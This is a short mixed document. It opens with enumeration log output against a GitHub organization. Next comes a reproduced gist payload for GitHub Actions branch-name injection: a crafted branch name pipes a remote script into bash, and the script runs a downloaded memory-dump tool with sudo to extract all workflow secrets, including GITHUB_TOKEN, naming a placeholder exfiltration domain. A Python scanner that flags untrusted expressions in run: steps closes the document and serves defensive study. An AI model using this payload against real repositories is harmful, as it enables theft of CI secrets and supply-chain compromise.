
[+] The authenticated user is: RampagingSloth
[+] The GitHub Classic PAT has the following scopes: gist, read:org, repo, workflow
[+] Enumerating the puppetlabs organization!
[!] The user has only public access!
[+] About to enumerate 561 repos within the puppetlabs organization!
[+] Querying and caching workflow YAML files!
[+] Querying 0 out of 6 batches!
[+] Querying 1 out of 6 batches!
[+] Querying 2 out of 6 batches!
[+] Querying 3 out of 6 batches!
AdnaneKhan / payload.sh
Created November 28, 2023 03:22
Universal "dump all secrets" payload for GitHub workflow branch name injection.
# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="https://your-exfil-domain.com"
# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'
# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
# Print to run log
echo $B64_BLOB
fi
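Defender's-side counterpart, added here and not part of the gist: a small scanner that flags the workflow pattern this payload relies on, an untrusted expression such as `${{ github.head_ref }}` expanded inside a `run:` script, and leaves the `env:` indirection that closes the hole unflagged. The list of untrusted fields and both workflow samples are constructed for this example.

```python
import re

# Event fields an external contributor controls (constructed, non-exhaustive list).
UNTRUSTED = r"github\.head_ref|github\.event\.pull_request\.(head\.ref|head\.label|title|body)"
EXPR = re.compile(r"\$\{\{\s*(" + UNTRUSTED + r")\s*\}\}")
RUN_KEY = re.compile(r"(-\s*)?run:\s*(.*)$")

def find_injections(workflow_yaml: str):
    """Return (line_no, expression) for each untrusted ${{ }} expression inside a
    `run:` script. The runner substitutes it as literal text before the shell parses
    the script, so a crafted branch name becomes shell syntax. The same expression
    under `env:` is not flagged: it reaches the script as a variable's value."""
    findings, in_run, run_indent = [], False, 0
    for no, line in enumerate(workflow_yaml.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        m = RUN_KEY.match(stripped)
        if m:                                   # start of a run: step
            in_run, run_indent = True, indent + len(m.group(1) or "")
            body = m.group(2)
        elif in_run and (not stripped or indent > run_indent):
            body = stripped                     # continuation of a block scalar (| or >)
        else:
            in_run = False                      # sibling key (env:, with:, ...) ends it
            continue
        findings.extend((no, e.group(1)) for e in EXPR.finditer(body))
    return findings

# Constructed samples: the first interpolates attacker-controlled values into shell,
# the second passes the same value through an environment variable instead.
VULNERABLE = """\
on: pull_request_target
jobs:
  build:
    steps:
      - run: |
          echo "Building ${{ github.head_ref }}"
      - name: title
        run: echo "${{ github.event.pull_request.title }}"
"""
HARDENED = """\
on: pull_request_target
jobs:
  build:
    steps:
      - run: echo "Building $BRANCH"
        env:
          BRANCH: ${{ github.head_ref }}
"""
```

Run it over every file under `.github/workflows/` in CI; a non-empty result is the condition that makes the payload above deliverable.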